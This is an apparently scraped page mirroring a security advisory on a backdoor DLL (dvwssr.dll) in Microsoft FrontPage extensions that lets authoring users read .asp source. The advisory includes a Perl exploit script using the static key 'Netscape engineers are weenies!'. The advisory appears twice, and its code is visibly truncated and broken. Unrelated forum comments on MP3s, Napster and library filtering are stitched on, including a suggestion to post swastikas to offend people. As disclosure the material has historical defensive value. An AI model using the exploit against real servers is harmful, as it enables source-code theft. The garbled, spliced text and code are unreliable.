The NT 4 Option Pack ships with a particular ISAPI.dll in /_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft FrontPage extensions (the version I have is 3.0.2.1105). This particular .dll allows you to read.asp (and.asa) files under the web root, providing you know the 'password' (obfuscated encoding scheme) of which to ask it. And, as implied by the title, the constant key used in the encoding is "Netscape engineers are weenies!".
I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to be used with InterDev 1.0. Therefore deleting it will affect InterDev 1.0's 'View Links' function. Also, the default permissions don't allow for anonymous users to use the.dll--however, anyone with web authoring can, and I've seen few sites that have allowed permission (which is more due to a misconfiguration on their part). As Microsoft has told me, the immediate problem is moreso the fact that any developer of one particular virtual site can download the.asp code of other virtual sites on the same system.
--[ 2. The long
In the fairly recent light of Mr. Cuartango's finding of a backdoor in the authentication of Microsoft installation packages, Microsoft (secure@microsoft.com actually) stated to Bugtraq that the automatic acceptance of Microsoft packages is to "improve our customers' experience while downloading software from Microsoft web sites."
Well, so let me relate how Microsoft has included an ISAPI.dll as part of the FrontPage extension package/Option Pack/Visual Interdev, to "improve a hacker's experience while downloading software from your web site".
I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me that dvwssr.dll looked like it was a backdoor, and that it contained the string 'Netscape engineers are weenies!'(although, it's found backwards in the.dll). Being the curious pup that I am, I decided to take a look. Using some prior research code attempts at cracking the encoding algorithm (herein referred to as the 'weenie algorithm'), I used a test ISAPI app Alf sent to figure out what the hell this thing was for, and what it is supposed to do. Searches on Microsoft's site said it was to 'verify URLs'. However, I could not find any references to it elsewhere, and even decompilation of the various FrontPage extension applications, FrontPage clients, and Interdev clients yeilded no calls or references to dvwssr.dll that I could see; however, I was later told that Interdev 1.0 requies this .dll. Microsoft's site had dvwssr.dll down on the manifest for various FrontPage packages/installations.
So, taking a peek at the.dll versions, I see that the other ISAPI.dlls that make up the core of FrontPage extensions are of version 3.0.2.1105, while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was recently introduced into the pack by Microsoft (if you don't know, FrontPage was an original program developed by Vemeer Technologies Inc; hence the _vti_ prefixes.) Granted, maybe it's possible that Vemeer engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers left it in there. You would think some sort of Q&A and/or audit would catch it if it already existed...
I'm not going to get into the exact details of the weenie encoding algorithm--after all, you have the code below. It's basically a 62 character slide-rule type of encoding.
Luckily, from my auditing, this is not included with any other versions of FrontPage (including Unix), and in the versions I found it on, ACLs prevented its use (only System and Administrators were allowed full access); I was told by MS that only individuals with web authoring permission can use it, which is more than I had originally thought. But it's not as widespread as, say, RDS.;)
Regardless of it's actual purpose, or Microsoft's intent, I think the core interesting issue is that Microsoft literally coded (or allowed) a.dll who used a static key such as 'Netscape engineers are weenies!'.
In any event, if you don't use Interdev 1.0, you can delete the file and call it a day. If you do use Interdev 1.0, well, it's your call, but I suggest an upgrade.
--[ 3. The code
#!/usr/bin/perl # dvwssr.pl by rain forest puppy (only tested on Linux, as usual) # # Usage: dvwssr.pl target_host/file/to/retrieve/source # use Socket;
$ip=$ARGV[0]; $file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n"; $url="GET/_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n"; print sendraw($url);
sub encodefilename { my $from=shift; my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789"; # #
sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }}
--[ 4. The End
I know this is short and not with it's usual flare. I apologize...I have been running around like mad, and basically don't have the time or energy to expend into this.:/
- rain forest puppy
Special thanks to Alf Serer, the founder of this bug; also, special thanks to attrition.org (especially McIntyre) for helping me wrangle this. I'm currently in the UK, so if you have immediate questions, I suggest you send an email to Alf or the Attrition staff (staff@attrition.org).
Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary Roesch, and others, at CanSecWest, May 10-12 in Vancouever, Canada. More info at www.dursec.com.
I got this from another comment, but I think he's onto something. Use a swastika or possibly an upside down US flag for the graphic. It will offend the hell out of everyone and probably get some attention. If swastikas or upside down flags start popping up all over the web, even on private pages, people will pay attention.
That's right folks its called radio. The record companies give away copies of music all the time. Then they encourage these radio stations to broadcast their songs to as many people as possible as often as possible. There have even been cases of record companies paying to have songs broadcast more often. I fail to see the logic in fighting Napster. If you really want a decent copy of a top 40 song all you have to do is turn on your radio and record the damn thing when it comes on. Most stations even give you an occasional oppurntunity to request a song so you can even schedule your recording. If it's a top 10 song you can get it off MTV's total request live via a digital cable connection. MP3s suck so bad I don't see why they even care.
Is anyone besides me just sick of people trying to make this distinction? Talk about a total waste of time. Let's face the music on this one folks, the war is over and we lost. The use of the term "hacker" media has caused the definition of the word to change and nothing can be done about it. Now let us get over it and move onto something else. Someone please come up with a new word we can use and everything will be fine. Feel free to moderate this as flamebait or off topic, but I just couldn't take it anymore.
If they just stand up for what they believe in then every library in the state will be forced to close its doors due to a lack of funding. It would be very embarrassing for Utah to be the only state without any libraries, even if it was only for a few days.
I guess it really doesn't matter. I'm sure this will get thrown out in court soon enough.
"...adopts and enforces a policy to restrict access by minors to Internet or online sites that contain obscene material."
I don't see why a library couldn't use a policy like the one in Holland had. They mentioned that the computers were always under the supervision of an adult who could see what was on the screen. As long as they make it formal policy and enforce it, it would seem that they would be in complience with the law. Am I missing something?
I can't believe that mp3 will ever replace CDs. Not to say something else wont do it, but it wont be mp3. I can't stand to listen to them. Why would anyone want any sort of lossey compression screwing up their favorite song? I might listen to an mp3 of music I wasn't about to purchase, but if it's music I'm really interested in, I'll want it in of its 44,100 Hz, 16 Bit Stereo glory.
Slashdot Mirror
Here it is. Not too much of a problem unless your authoring permissions are messed up or your hosting multiple domains.
- --------------------------
- -------------------------- - --------------------------
.dll in .asp (and .asa) files under the web root,
.dll--however, anyone with web authoring .asp code of other virtual sites on the same
.dll as part of
.dll). Being the curious pup that I am, I decided to take a look.
.dll versions, I see that the other ISAPI .dlls
;)
.dll
/file/to/retrieve/source
/_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($fi le)." HTTP/1.0\n\n";
p qrstuvwxyz0123456789";
:/
----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------
"Netscape engineers are weenies!"
A back door in Microsoft FrontPage extensions/authoring components
------------------------------------- Alf Serer / alf@at.clientlogic.com
- rain forest puppy / rfp@wiretrip.net
Table of contents:
-1. The short
-2. The long
-3. The code
-----------------------------------------------
"...we love a good conspiracy theory as much as the next person..."
- secure@microsoft.com
-----------------------------------------------
UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA UMBRA
-----------------------------------------------
--[ 1. The short
The NT 4 Option Pack ships with a particular ISAPI
/_vti_bin/_vti_aut/ named dvwssr.dll, which is mixed in with the Microsoft
FrontPage extensions (the version I have is 3.0.2.1105). This particular
.dll allows you to read
providing you know the 'password' (obfuscated encoding scheme) of which to
ask it. And, as implied by the title, the constant key used in the
encoding is "Netscape engineers are weenies!".
I've been told that dvwssr.dll is a component of the NT 4 Option Pack, to
be used with InterDev 1.0. Therefore deleting it will affect InterDev
1.0's 'View Links' function. Also, the default permissions don't allow
for anonymous users to use the
can, and I've seen few sites that have allowed permission (which is more
due to a misconfiguration on their part). As Microsoft has told me, the
immediate problem is moreso the fact that any developer of one particular
virtual site can download the
system.
--[ 2. The long
In the fairly recent light of Mr. Cuartango's finding of a backdoor in the
authentication of Microsoft installation packages, Microsoft
(secure@microsoft.com actually) stated to Bugtraq that the automatic
acceptance of Microsoft packages is to "improve our customers' experience
while downloading software from Microsoft web sites."
Well, so let me relate how Microsoft has included an ISAPI
the FrontPage extension package/Option Pack/Visual Interdev, to "improve a
hacker's experience while downloading software from your web site".
I was contacted by Alf Serer (alf@at.clientlogic.com), who indicated to me
that dvwssr.dll looked like it was a backdoor, and that it contained the
string 'Netscape engineers are weenies!'(although, it's found backwards in
the
Using some prior research code attempts at cracking the encoding algorithm
(herein referred to as the 'weenie algorithm'), I used a test ISAPI app
Alf sent to figure out what the hell this thing was for, and what it is
supposed to do. Searches on Microsoft's site said it was to 'verify
URLs'. However, I could not find any references to it elsewhere, and even
decompilation of the various FrontPage extension applications, FrontPage
clients, and Interdev clients yeilded no calls or references to dvwssr.dll
that I could see; however, I was later told that Interdev 1.0 requies this
.dll. Microsoft's site had dvwssr.dll down on the manifest for various
FrontPage packages/installations.
So, taking a peek at the
that make up the core of FrontPage extensions are of version 3.0.2.1105,
while dvwssr.dll is only 1.00.00.2503A. I would think that to mean it was
recently introduced into the pack by Microsoft (if you don't know,
FrontPage was an original program developed by Vemeer Technologies Inc;
hence the _vti_ prefixes.) Granted, maybe it's possible that Vemeer
engineers coded dvwssr.dll; but that means, upon acquisition, MS engineers
left it in there. You would think some sort of Q&A and/or audit would
catch it if it already existed...
I'm not going to get into the exact details of the weenie encoding
algorithm--after all, you have the code below. It's basically a 62
character slide-rule type of encoding.
Luckily, from my auditing, this is not included with any other versions of
FrontPage (including Unix), and in the versions I found it on, ACLs
prevented its use (only System and Administrators were allowed full
access); I was told by MS that only individuals with web authoring
permission can use it, which is more than I had originally thought. But
it's not as widespread as, say, RDS.
Regardless of it's actual purpose, or Microsoft's intent, I think the core
interesting issue is that Microsoft literally coded (or allowed) a
who used a static key such as 'Netscape engineers are weenies!'.
In any event, if you don't use Interdev 1.0, you can delete the file and
call it a day. If you do use Interdev 1.0, well, it's your call, but I
suggest an upgrade.
--[ 3. The code
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host
#
use Socket;
$ip=$ARGV[0];
$file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n";
$url="GET
print sendraw($url);
sub encodefilename {
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmno
#
#
my $key="Netscape engineers are weenies!";
#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
@letts=split(//,$from);
foreach $lett (@letts){
$fv=index $slide, $lett;
$fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
$kv=index $slide, substr $key, $kc, 1;
if($kv>=0 && $fv>=0){
$tmp= $kv - $fv;
if($tmp = length($key)){ $kc=0;}
}return $to;}
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
--[ 4. The End
I know this is short and not with it's usual flare. I apologize...I have
been running around like mad, and basically don't have the time or energy
to expend into this.
- rain forest puppy
Special thanks to Alf Serer, the founder of this bug; also, special thanks
to attrition.org (especially McIntyre) for helping me wrangle this. I'm
currently in the UK, so if you have immediate questions, I suggest you
send an email to Alf or the Attrition staff (staff@attrition.org).
Catch me, along with Fyodor, Ron Gula, Ken Williams, Theo DeRaadt, Mary
Roesch, and others, at CanSecWest, May 10-12 in Vancouever, Canada. More
info at www.dursec.com.
------------------------------------- Alf Serer / alf@at.clientlogic.com
- rain forest puppy / rfp@wiretrip.net
Regardless if Netscape engineers are weenies, Microsoft engineers
are definately pompous
----- UMBRA Advisory RFP2K02 -------------------------- rfp.labs ---------
I got this from another comment, but I think he's onto something. Use a swastika or possibly an upside down US flag for the graphic. It will offend the hell out of everyone and probably get some attention. If swastikas or upside down flags start popping up all over the web, even on private pages, people will pay attention.
That's right folks its called radio. The record companies give away copies of music all the time. Then they encourage these radio stations to broadcast their songs to as many people as possible as often as possible. There have even been cases of record companies paying to have songs broadcast more often. I fail to see the logic in fighting Napster. If you really want a decent copy of a top 40 song all you have to do is turn on your radio and record the damn thing when it comes on. Most stations even give you an occasional oppurntunity to request a song so you can even schedule your recording. If it's a top 10 song you can get it off MTV's total request live via a digital cable connection. MP3s suck so bad I don't see why they even care.
Friends don't let friends use MP3.
Is anyone besides me just sick of people trying to make this distinction? Talk about a total waste of time. Let's face the music on this one folks, the war is over and we lost. The use of the term "hacker" media has caused the definition of the word to change and nothing can be done about it. Now let us get over it and move onto something else. Someone please come up with a new word we can use and everything will be fine.
Feel free to moderate this as flamebait or off topic, but I just couldn't take it anymore.
If they just stand up for what they believe in then every library in the state will be forced to close its doors due to a lack of funding. It would be very embarrassing for Utah to be the only state without any libraries, even if it was only for a few days.
I guess it really doesn't matter. I'm sure this will get thrown out in court soon enough.
"...adopts and enforces a policy to restrict access by minors to Internet or online sites that contain obscene material."
I don't see why a library couldn't use a policy like the one in Holland had. They mentioned that the computers were always under the supervision of an adult who could see what was on the screen. As long as they make it formal policy and enforce it, it would seem that they would be in complience with the law. Am I missing something?
I can't believe that mp3 will ever replace CDs. Not to say something else wont do it, but it wont be mp3. I can't stand to listen to them. Why would anyone want any sort of lossey compression screwing up their favorite song? I might listen to an mp3 of music I wasn't about to purchase, but if it's music I'm really interested in, I'll want it in of its 44,100 Hz, 16 Bit Stereo glory.